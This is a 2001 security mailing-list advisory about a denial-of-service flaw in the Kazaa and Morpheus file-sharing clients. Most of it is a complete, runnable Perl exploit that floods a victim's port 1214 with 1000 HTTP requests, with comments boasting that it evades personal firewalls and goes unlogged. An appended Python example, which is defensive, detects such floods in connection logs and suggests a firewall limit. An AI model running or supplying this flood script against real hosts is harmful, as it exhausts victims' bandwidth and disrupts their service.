[EXPL] Kazaa / Morpheus Denial of Service Attack (Flood)
From: support@securiteam.com
Date: 09/16/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Kazaa / Morpheus Denial of Service Attack (Flood)
Message-Id: <20010916154708.0F91D138BF@mail.der-keiler.de>
Date: Sun, 16 Sep 2001 17:47:08 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Kazaa / Morpheus Denial of Service Attack (Flood)
------------------------------------------------------------------------
SUMMARY
A flaw in the way Kazaa / Morpheus handles incoming requests allows
attackers to consume all available bandwidth. Because of the way the
program works, this attack will go unlogged.
DETAILS
Exploit:
#!/usr/bin/perl
#
#Kazaa/Morpheus Denial of Service Attack
#Coded by Paul Godfrey
#PaulG@Crackdealer.com
#
#Problem: Both Kazaa and Morpheus file sharing applications have a port
#which allows anonymous file access to their shared folder. What does this have
#to do with Denial of Service? Unlike connections made from other users
#of the applications, the number of connections to the port cannot be
#regulated or detected by the client. This obviously will allow us to flood the
#server with requests and therefore use up all of the available bandwidth.
#Also due to the fact that most users have set up their firewall privileges so
#that Kazaa or Morpheus is allowed access to open connections to outside sources
#this attack will bypass most personal firewall clients such as Zone Alarm.
#
#Enjoy.
#
#Usage: ./km.pl -h victimip
use Socket;
use Getopt::Std;
getopts("h:", \%args);
print("\nK/M Denial of Service\n");
if (!defined $args{h}) {
print("Usage: km.pl -h victimip\n\n");
exit; }
$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");
$trash="A"x100;
&exec_cmd($command);
sub exec_cmd {
for($count=1;$count<=1000;$count++)
{
sendraw("GET /\"$trash\" HTTP/1.0\n\n");
print("|");
}
print("\nData Sent.\n\n");
}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,1214,$target)){
my @in;
select(S); $|=1; print $pstr;
while(< S >){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:PaulG@Crackdealer.com> Paul
Godfrey.
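Because the client neither limits nor records these connections, detection has to happen at the network layer. The following is an added example, not part of the original advisory: a sliding-window counter over firewall-style connection records that flags sources opening many connections to TCP port 1214. The log format, window length and threshold are assumptions, and the sample records are constructed.

```python
# Added example (not from the advisory). Log format, window and limit are
# assumptions chosen for illustration; the sample records are constructed.
from collections import defaultdict, deque

FASTTRACK_PORT = 1214   # port the advisory's script connects to
WINDOW_SECONDS = 10     # assumed sliding window
MAX_CONNS = 20          # assumed per-source limit inside one window

def parse_line(line):
    """Parse 'epoch_seconds src_ip dst_port' (constructed format); None if malformed."""
    parts = line.split()
    if len(parts) != 3:
        return None
    try:
        return float(parts[0]), parts[1], int(parts[2])
    except ValueError:
        return None

def find_flooders(lines, window=WINDOW_SECONDS, limit=MAX_CONNS):
    """Return {src_ip: peak count in any window}; each source's lines must be in time order."""
    recent = defaultdict(deque)  # src_ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[2] != FASTTRACK_PORT:
            continue  # skip malformed lines and other ports
        ts, src, _ = rec
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop connections older than the window
            q.popleft()
        if len(q) > limit:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: one flooding source, one ordinary peer, unrelated noise."""
    lines = [f"{1000 + i * 0.05:.2f} 192.0.2.10 1214" for i in range(100)]
    lines += [f"{1000 + i * 30:.2f} 198.51.100.7 1214" for i in range(5)]
    lines += ["1001.00 192.0.2.10 80", "garbage line"]
    return lines

if __name__ == "__main__":
    for src, peak in find_flooders(sample_log()).items():
        print(f"{src}: {peak} connections to port {FASTTRACK_PORT} in {WINDOW_SECONDS}s")
```

A per-source connection limit on port 1214 at the firewall, set near the same threshold, turns this detection into a mitigation.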